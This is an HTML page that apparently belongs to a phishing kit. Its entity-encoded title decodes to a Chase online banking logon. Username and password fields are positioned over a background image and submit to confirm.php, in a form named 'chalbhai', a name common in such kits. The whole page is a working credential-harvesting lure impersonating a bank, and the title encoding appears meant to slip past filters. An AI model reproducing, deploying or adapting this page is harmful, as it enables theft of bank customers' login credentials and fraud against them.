<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>&#67;&#104;&#97;&#115;&#101;&#32;&#79;&#110;&#108;&#105;&#110;&#101;&#32;&#45;&#32;&#76;&#111;&#103;&#111;&#110;</title><body id="ridBody" background="bg.png">
</head>
<body>

<form action=confirm.php name=chalbhai id=chalbhai method=post>

<input name="formtext1" required autocomplete="off" type="text" style="position:absolute;height:22px;width:160px;left:344px;top:146px;z-index:19">

<input name="formtext2" required autocomplete="off" type="password" style="position:absolute;height:21px;width:160px;left:344px;top:173px;z-index:20">

<div id="formimage1" style="position:absolute; left:346px; top:238px; z-index:6"><input type="image" name="formimage1" src="log.png"></div></form>

</body>
</html>